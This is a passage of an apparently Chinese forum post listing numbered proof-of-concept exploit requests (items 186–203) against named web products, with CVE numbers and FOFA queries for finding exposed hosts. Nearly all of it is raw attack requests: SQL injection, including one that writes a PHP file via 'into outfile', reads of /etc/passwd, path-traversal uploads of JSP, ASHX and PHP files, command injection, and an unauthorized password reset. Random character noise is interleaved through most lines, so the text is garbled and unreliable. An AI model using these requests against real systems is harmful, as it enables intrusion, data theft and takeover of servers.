; V5 y' T9 ~# O6 E1 @8 ZGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
3 C; q' f1 y6 n# Q$ pHost: host
9 i( J, G: l! y
5 q- P x% f( W& n! p8 w1 U6 T1 i8 v0 A8 z5 Z) f0 j8 ]
186. F-logic DataCube3 SQL注入! B. c* d- s+ v6 P
CVE-2024-31750
* s2 O6 Z* X7 M+ } e( s$ M' aF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统5 g$ o* e. x) T+ k( `8 e+ `6 u" M
FOFA:title=="DataCube3"
; {$ G! a0 _* t% MPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1
! T0 S7 z& e3 I" i# S2 sHost: your-ip
! o$ o4 ^' u: d6 @- }- @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" g& f% r, |" r7 [' Q& J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
# w& Z" m2 T: G' DAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# J' g# L, H! H3 J
Accept-Encoding: gzip, deflate
3 B {% r9 X; d1 k( vConnection: close
$ M/ G: s# ` F- t- `Content-Type: application/x-www-form-urlencoded! Z) g, P! c$ k5 Q
% d+ @$ ]' ^! w+ Ureq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
, b) o' L+ h& F y! h0 b* I8 _7 L$ H5 s& y
! P7 i3 q( [5 m! M* m: H6 k% Q; O D187. Mura CMS processAsyncObject SQL注入# t$ M9 g: ]+ J7 h" u
CVE-2024-326406 A h3 ^$ ^; v/ y | u# M
FOFA:"Mura CMS") Y) a/ L3 s$ j
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.17 Q, m( s; C3 c W8 P" {
Host: your-ip
3 ~" O. T0 I6 j% V8 f8 w7 q, oContent-Type: application/x-www-form-urlencoded. e' s. ]% q7 T) m( {: h/ c& U
2 E( l0 C+ B# J, S4 ~+ y9 t8 {, \; W
; X# T) B: }: W5 @$ @% q0 O+ x. J
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
+ k* u; V, F U$ ?! [4 m. {( C4 k$ p' m# J
% k, E M" f2 O5 e5 x188. 叁体-佳会视频会议 attachment 任意文件读取6 k$ f1 U' b1 m# x% p
version <= 3.9.7
^3 j1 _. q7 M: kFOFA:body="/system/get_rtc_user_defined_info?site_id"
* Q, U* D( F" ?+ M6 }& P) [2 B5 G" LGET /attachment?file=/etc/passwd HTTP/1.1
`. W( Y. i$ Y/ yHost: your-ip
( s! |- C- ^* W. E; K+ X, OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
3 p$ r& h9 M: R3 s, x" L" rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" S' F) N( O% P7 }
Accept-Encoding: gzip, deflate; |6 s; V0 L0 I: ^( [6 {4 h; u/ {
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8( @4 s% A3 f4 s2 J% i# ]
Connection: close% q5 v/ _, v5 i( ?
8 W7 T' _' D$ D8 @1 r) `. M; c: ~) L5 `, i) ~$ W0 K' s8 G
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
5 {! | ?; ~- y# @6 f* lFOFA:app="LANWON-临床浏览系统"
& u* v) N6 M+ u2 y: H5 H, JGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
6 z; O/ o) y: |Host: your-ip; \) @7 Q, c. _& w9 Y: I
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
# [0 ~ i( f4 t/ ?" q qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) F2 r' M5 D/ g0 j: W: nAccept-Encoding: gzip, deflate
' s3 J, b) ?3 Q' g, xAccept-Language: zh-CN,zh;q=0.94 Q; j0 O8 z+ m" }0 A' C
Connection: close
. V9 C2 D( L l$ N
% O9 b$ Y" v5 O" m9 J* c5 z7 o; z. n& u" Y
190. 短视频矩阵营销系统 poihuoqu 任意文件读取2 X; l0 c" P4 h0 C! w
FOFA:title=="短视频矩阵营销系统"
/ _6 c% K7 Y% y" X; U3 YPOST /index.php/admin/Userinfo/poihuoqu HTTP/2
1 b8 @+ w8 c7 v( e/ I' f& n% c/ g1 pHost: your-ip
" b6 h4 T/ W/ u7 g! x" P2 BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
6 S5 s+ O0 g1 H: Z! T) _% u2 pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9. q8 W5 x, |0 |' f" P# A& w) B
Content-Type: application/x-www-form-urlencoded
6 _/ v" b6 x5 h! x0 C iAccept-Encoding: gzip, deflate
6 q% c, H% `# ^. W; f7 |7 NAccept-Language: zh-CN,zh;q=0.9
- h* i. ?: e+ [1 d1 ~
) g- i1 j( H2 S; p) ipoi=file:///etc/passwd
7 u' K5 n9 |9 L% \4 `! p+ f( {3 D7 V3 U
2 W/ G: d' ^9 n3 t8 T3 `0 b
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
X' T& B/ J! W* q9 QFOFA:body="/CDGServer3/index.jsp"
' T) L8 K0 v! q/ m' d! w, ^) }* JPOST /CDGServer3/js/../NavigationAjax HTTP/1.1: V6 R! \4 b7 F- c* \# `
Host: your-ip3 G9 |; u4 j4 `- a+ c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" {# i3 @7 y, g0 ^. |
Content-Type: application/x-www-form-urlencoded
: A+ Q+ `1 T3 ]
! f' b9 h3 Q# y* }# p z7 kcommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
# T) ~( J7 B1 R
& w5 _* s. ?( S. z
/ c9 h$ h" O& E% b9 V. b7 a192. 富通天下外贸ERP UploadEmailAttr 任意文件上传4 T/ }) U+ t Q `2 p
FOFA:title="用户登录_富通天下外贸ERP"0 C+ p2 n- I2 @/ n/ q& @
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
9 W1 j8 ~ h( ^$ ~9 nHost: your-ip& x% J& P* ?; g% n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.361 D" V0 J& W9 V& u4 a i
Content-Type: application/x-www-form-urlencoded
# m( Q' g8 |; O4 X8 j; _# g0 |: r: n& u4 h8 p$ I6 L/ e
; K4 i; l. G5 |
<% @ webhandler language="C#" class="AverageHandler" %>8 s0 I3 S' e6 U4 f7 I7 B$ ^
using System;
! k# r! v& h0 y# R9 W! T! Musing System.Web;
2 N4 U, p! V& |0 xpublic class AverageHandler : IHttpHandler) l1 B# ?6 ^/ A# P2 E
{
# }( b3 x" n1 H+ T: C+ `public bool IsReusable
( v4 w& O7 E7 g( p4 K8 E! b{ get { return true; } }$ b9 i, X" ?& t
public void ProcessRequest(HttpContext ctx)8 A' L3 j" u9 I* ~4 D/ V" N4 p
{$ X2 _8 {" B" u) l: j0 O2 C& ^
ctx.Response.Write("test");7 w" O: O! D( N2 [0 c/ \
}' T9 h( ? @! {2 R% D& R8 E
}' Y' _% @; }5 i$ A
9 G: O) L% g) j
! q7 H+ b1 A( J# E* m. h5 p3 u" f2 A193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行( {: I! W; Q; J/ T
FOFA:body="山石云鉴主机安全管理系统"+ C* ~$ N. B, g- i F1 f0 R" B
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
; s) U4 S; ]6 ?( e, E4 bHost:7 b+ K( N) \" E! _& h' u3 C
Cookie: PHPSESSID=2333333333333;& k" H! f* c }' ~: J% }
Content-Type: application/x-www-form-urlencoded" m9 W6 x# N0 ]( ^: I
User-Agent: Mozilla/5.02 U. r9 N. V4 p; X8 v3 k
2 |* S- H9 Z( N& H
3 F6 e! u d7 _% P: O+ B1 f# S6 ]POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1$ | R% ]% C0 V: \% a
Host:' |9 `% u! O4 ]6 K5 E4 m1 }! K/ P
User-Agent: Mozilla/5.0% @1 D+ Q/ L9 C- {2 [ r
Accept-Encoding: gzip, deflate* v- ~3 h+ j3 A& C( W) Q, k, o! m
Accept: */*" {6 j* E a9 ^2 O0 U% s* T
Connection: close/ v& u7 Z( z/ h5 _4 c0 w( F
Cookie: PHPSESSID=2333333333333;6 V6 R7 X7 X; {% A8 u; g
Content-Type: application/x-www-form-urlencoded* I& p6 q; r5 A
Content-Length: 84
V; p5 O' u5 e* o) z( m( Z
& a9 Q( E! n, _0 h. Dparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
8 b; q2 K: P, q9 C, x
! v- G Y% Z. O+ i) k
+ M3 L) G+ d* A" Z7 @GET /master/img/config HTTP/1.1
6 f6 W2 |( K$ i! G0 o3 _8 lHost:
: ^7 o- k5 {, [+ }% g2 pUser-Agent: Mozilla/5.04 E: s* @" T- ?8 S& o) r- a0 Y
5 f/ g1 g: x, M4 c% C
8 L4 {" Z* |- k5 W194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
. U: p3 n5 M5 J3 w$ UFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在* O% P: u" E( G
& y }, f3 l, ~& S* u; ^
POST /servlet/uploadAttachmentServlet HTTP/1.1" U w- |( k7 g, T) |2 W
Host: host
9 Z3 q- Z& a! f" WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.363 X0 p' ]; z0 J7 b8 ? y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8& w9 x8 ~3 i" e5 ^+ N
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) Y, |9 B7 F* m
Accept-Encoding: gzip, deflate
! X7 R4 M( Q T# `Connection: close
9 {, {/ e* ?/ i8 x' Z9 H+ ?Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk, B5 ?( z8 T+ \6 m( E. f7 ~! O
------WebKitFormBoundaryKNt0t4vBe8cX9rZk1 @. S+ ]/ Z' q# `
$ {; L! R" t. p6 d$ |8 a5 w: ]
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"" _* y& G0 W: p2 L; G" l$ t, n$ c8 g
Content-Type: text/plain
8 `! }, [5 z" G; ]2 o' O<% out.println("hello");%>
7 d; j/ U5 D7 M/ p0 d* ?* Y------WebKitFormBoundaryKNt0t4vBe8cX9rZk+ F1 U; c9 `; Y, _; Q" w7 w
Content-Disposition: form-data; name="json"' @- j- I0 }, ~
{"iq":{"query":{"UpdateType":"mail"}}}, X; s2 q! N) f+ Y
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--/ Z5 p z+ i1 T, \# Q- a+ Z! o
) v; @' j8 n- Y0 f) o* `
* q& n& @$ `5 _" R- a* T" u195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
- x' z/ t6 j5 @FOFA:title=="飞鱼星企业级智能上网行为管理系统2 Z, w3 k- t s/ \- b/ a7 P
POST /send_order.cgi?parameter=operation HTTP/1.1
0 m5 ^' i6 i7 ]/ WHost: 127.0.0.1/ c+ v" M/ E" k Q! z
Pragma: no-cache/ C, G) N6 e+ K9 x- ~
Cache-Control: no-cache- O q* U9 j7 W+ v6 p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
- I, c8 e6 C% g4 i- {6 ~; KAccept: */*9 Q) e7 h: _2 K" }
Accept-Encoding: gzip, deflate
3 C: J' l* [9 T- B( jAccept-Language: zh-CN,zh;q=0.9
# P3 O/ r+ [8 t- XConnection: close
: W" B& ?6 n( r( `2 z% BContent-Type: application/x-www-form-urlencoded- S( k1 }' Q, k, V- F6 t1 g" L
Content-Length: 68
1 c# O. e4 n: c& b; U
5 |% m8 U: n$ k8 [' Z7 M5 Y/ C{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}1 q$ F. M# k7 s
' \2 R7 O0 N- Q; s
" I7 x1 a6 q/ f1 P196. 河南省风速科技统一认证平台密码重置
' m4 n: b) P6 o# s- N: ~FOFA:body="/cas/themes/zbvc/js/jquery.min.js"4 z7 W* G8 I x9 s* v9 a
POST /cas/userCtl/resetPasswordBySuper HTTP/1.10 W1 F/ A9 s; f& {% E7 [7 K- N: W
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.364 W2 Q5 l1 |. Q
Content-Type: application/json;charset=UTF-8
& B$ g/ k% ]7 N" c$ J+ F; R: _X-Requested-With: XMLHttpRequest
8 p o# c* ~9 {$ T( U% t7 R# pHost:
, i" T& g) G; q0 f: t5 b: k) zAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
% U/ ~( Z; e9 Y+ ^Content-Length: 455 s- \* L4 f4 t) q7 n
Connection: close
) t1 g! ^5 e& B- V: _
. I- {4 I2 I0 K; e: j2 `{"xgh":"test","newPass":"test666","email":""}
' ?3 q" I6 z1 u4 ]0 B- K8 `$ n7 \
* q5 d# V; ]1 I( f5 ^, }
9 ^$ }/ Q" u) X6 B3 A/ t197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入- x" ?) Q# T R, g
FOFA:app="浙大恩特客户资源管理系统"
) |; j& ~# Y$ mGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
1 e3 q" @3 ^# mHost:' [3 C- I% c2 A f5 b+ ~0 t2 x. K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
5 X2 w$ @2 O! a! T- g- AAccept-Encoding: gzip, deflate4 M8 r8 f* K5 q) I% U
Connection: close* `4 j; k. N& \( x
, j" Q2 h: I1 Q0 V! {8 ~$ i1 g% k$ {2 c
0 T0 P v7 {8 l+ @% D) u+ I0 i
( Z: j! V4 t/ u1 K/ G1 c: x3 ]" n198. 阿里云盘 WebDAV 命令注入$ d: T& P: i6 ^0 r1 o v
CVE-2024-29640
. z, L- y H8 d8 gGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1& T1 _% ?# c$ s3 @
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf643 t- Z( G5 F7 v, X; k
Accept: */*: r. e: t! g) C$ g& Z
Accept-Encoding: gzip, deflate5 o4 J1 f2 @, u% d( w5 X. p
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
6 I/ S E0 I4 A. {/ h" c* bConnection: close
, _! W6 x. j5 W# }( l* a- I7 T9 t+ Z
! u! h. M2 D; Q4 e7 O8 `- @$ L199. cockpit系统assetsmanager_upload接口 文件上传& @$ W5 K/ N0 w0 c' ~& r
2 o/ G | H9 |% {7 `/ J6 Z1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:+ m: }* j4 g- t. b7 D% |$ V
GET /auth/login?to=/ HTTP/1.1. d, |/ S! N4 R) C
7 }- n2 [1 }9 R* z- g响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"9 V6 `' y$ z4 k; n+ c9 [
1 K1 o+ ~* q2 a
2.使用刚才上一步获取到的jwt获取cookie:
6 s! Y: s- _! r) G4 Z9 D; ?# v" u2 I% x$ Z2 w
POST /auth/check HTTP/1.1 r# F6 y# `8 V Q7 Q
Content-Type: application/json6 p/ x; W" \! D; y: K
% ?: L: k: h! V9 C
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}1 O/ |( D# A% n+ x0 [) O9 \
( I/ K7 V% `5 F- u$ B, Y! {9 j/ X
响应:200,返回值:' A6 s& {; Z) `+ G/ r4 C& G
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
4 C/ W. J+ j" D; ?( n- CFofa:title="Authenticate Please!"
4 t; d, g# U$ |POST /assetsmanager/upload HTTP/1.1
q, y# E3 v7 J, pContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
" C0 s, x& T: j1 ~& ?4 V$ x. [Cookie: mysession=95524f01e238bf51bb60d77ede3bea92: c7 N. f3 f: m# ]
2 u" D- b# o e, b7 c' x6 V
-----------------------------36D28FBc36bd6feE7Fb3
/ B: Z$ m# E7 g" d$ jContent-Disposition: form-data; name="files[]"; filename="tttt.php"
s9 [& W2 n! kContent-Type: text/php1 @2 D" ?7 v( W7 s
0 ?3 V- r/ r7 E<?php echo "tttt";unlink(__FILE__);?>' ]+ _$ }: u: y4 Q4 N
-----------------------------36D28FBc36bd6feE7Fb3& w7 g1 v7 z* M9 [- f) P
Content-Disposition: form-data; name="folder"% K2 K. v4 H7 {2 n( K
/ S) G3 s' ~# ^. H: f5 I# T- |/ q
-----------------------------36D28FBc36bd6feE7Fb3--, P. Q8 b9 ]+ l9 u; v+ G( h1 u+ \$ F
, e ~* ]* S! _3 M9 v. f
8 H0 ^7 ]7 ^5 K9 R! q
/storage/uploads/tttt.php
! j5 n1 {/ K% L+ i+ H- A$ q- O: S
/ c; J. A: A7 h* F; N7 d, I200. SeaCMS海洋影视管理系统dmku SQL注入
) ]+ U, b8 B; W' y. E; V% BFOFA:app="海洋CMS"
- v6 D2 T! L# e, V7 lGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
) L& w1 ^* {% z3 j- e$ G5 XCookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s$ Z/ c, y: S* o5 C2 d
Upgrade-Insecure-Requests: 1% H. A1 [% S! S' h( l! x! T) `
Cache-Control: max-age=0
4 ? F: i, A6 m" v) X2 AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- O2 c' b! `& I8 Y7 ZAccept-Encoding: gzip, deflate, k* W+ L( `. m& s1 A$ o
Accept-Language: zh-CN,zh;q=0.9
: d$ W$ s# u# j! D0 x/ l, ~# V: C+ j# F& ^4 I
* m9 K7 ?7 Z8 {
201. 方正全媒体新闻采编系统 binary SQL注入% l) i7 W3 {/ D( Q
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
: _1 m q4 k& ^2 bPOST /newsedit/newsplan/task/binary.do HTTP/1.1
4 c( a; g5 _3 c& L; T3 ` XContent-Type: application/x-www-form-urlencoded
" R7 v. n2 R/ u8 ~0 z& d' R8 jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 V0 g0 Y: t- ^- B R0 j" D4 r" v
Accept-Encoding: gzip, deflate
T: W5 q; Y# P, o1 D. n& I! n7 AAccept-Language: zh-CN,zh;q=0.93 j' ?0 {! K( o5 t
Connection: close
3 [# z( @6 C6 r( [; N7 j; Z, s6 S+ B$ x
; f+ t" G$ v- } D; M# w+ h7 bTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
# I" [+ k+ m8 S/ |8 W9 n3 z1 _/ }. ~1 K7 Q
1 E* M( g# ]6 o, k. |" y0 E$ d, X# C
202. 微擎系统 AccountEdit任意文件上传
k# U3 O/ J% R# z5 E) n ZFOFA:body="/Widgets/WidgetCollection/"
+ V0 c- g) \3 F; }$ W: M获取__VIEWSTATE和__EVENTVALIDATION值
. r8 k! Q% d7 c, t+ |7 }* T5 a3 _GET /User/AccountEdit.aspx HTTP/1.1! u6 h/ k4 N, [. b5 S( L" x' z
Host: 滑板人之家
7 {! ~% n/ r; g* t) F, TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
3 e0 |9 J. a# x3 I6 e% RContent-Length: 0
0 C2 `' _. G9 K2 E) W. ~8 a" r' T+ O; V! [
" \' _! J% a9 |7 c
替换__VIEWSTATE和__EVENTVALIDATION值
0 \& F' [2 i6 ]: APOST /User/AccountEdit.aspx HTTP/1.1 j \: e- f9 r! ^
Accept-Encoding: gzip, deflate, br: y8 P. ^1 U; W8 W
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
/ T3 C! y. ]" i$ v3 \8 s) b. _6 @& n# R# `% K6 B/ \+ Z
-----------------------------786435874t385875938657365873465673587356877 K5 [3 j1 ?- M3 e0 K' y
Content-Disposition: form-data; name="__VIEWSTATE"
8 l( y P7 ^+ }: k) V- v' ?) q
' A4 n8 c0 g! |__VIEWSTATE
4 |4 K l# b% i$ [0 Z7 D2 o-----------------------------786435874t385875938657365873465673587356873 K, |) Z0 C- v; p1 _% v
Content-Disposition: form-data; name="__EVENTVALIDATION"
. N5 i: U$ g# x/ t. s7 j ^9 `
- m( D6 a6 C+ ]7 R. ?! ~) v__EVENTVALIDATION1 K: H2 M L3 I( H
-----------------------------786435874t38587593865736587346567358735687- o" s/ q1 n( G, O/ a: y
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"% L, `' h3 B% E+ {. v
Content-Type: text/plain
9 j7 a* m: v% T: T) Y* A
9 ]. F$ O- C* g% W$ x7 l- hHello World!7 |; F7 }3 Q) w( P
-----------------------------786435874t38587593865736587346567358735687+ v. B: o1 _' M. g& B! I# f
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
% t& S) N, y% B7 a& M/ X6 u C$ r' ~1 b2 M8 p0 G
上传图片
; y1 e0 _+ H5 F5 V-----------------------------786435874t38587593865736587346567358735687
5 A' Q9 J( X- N* LContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"% Z8 ^! d; c1 f" V
0 E: X( m$ R0 D4 V- o) U+ e. j7 a
. S5 c( D/ C2 X5 R, X
-----------------------------786435874t38587593865736587346567358735687; u G2 {; Q0 R5 D/ N+ W( h6 s
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
; H, ^. z) g+ X+ e# [1 q
/ h, g4 ]5 I: c7 G* r6 c1 [" D/ U% F8 Q
-----------------------------786435874t38587593865736587346567358735687--% Y, O' }& i7 O! Q. _
0 b$ d9 U8 W+ Q$ Y$ b+ X! G) Q$ p! K: j3 j/ N2 ~
/_data/Uploads/1123.txt
' ~3 ?; c/ i5 p- K5 @! \$ |& H: S& ^5 M9 e4 p
203. 红海云EHR PtFjk 文件上传
$ \2 g. Z+ K7 |% {- EFOFA:body="RedseaPlatform"
2 s h$ `9 o3 r9 m* {# PPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.15 z" H8 S3 V2 a; O* K$ ?3 q
Host: x.x.x.x
1 n8 F, M& x. j" p* MAccept-Encoding: gzip v& m7 J4 X9 Y0 A; |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.153 F5 C0 L6 F8 B- I
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4; q, q% t7 C2 w5 n* d, J( [
Content-Length: 210
& y1 m+ F. K1 x( V, d
7 }" H5 [) Y% z------WebKitFormBoundaryt7WbDl1tXogoZys4
* e2 x* I5 X+ K+ @, ^/ O) ZContent-Disposition: form-data; name="fj_file"; filename="11.jsp"
* C5 d" D6 ~1 Q$ qContent-Type:image/jpeg' {( A2 X p, A6 J
, t8 z2 }' q# M+ V# L: _* h% f0 W
<% out.print("hello,eHR");%>
! o5 N6 E5 H* {3 M------WebKitFormBoundaryt7WbDl1tXogoZys4--
5 s' X) E6 C: G; p% m9 x r8 ~6 T2 m
6 l9 D4 Z9 M7 D, |- f
5 l6 a& b7 { z
7 R8 u3 Z$ o0 B) n o1 c M$ ?7 z, E2 v: H: Z
) I' s0 l: w9 ?+ P o4 G
5 J# K, y- K% m. V. K, p
|
发表于 2024-6-5 14:31:29
收藏
支持
反对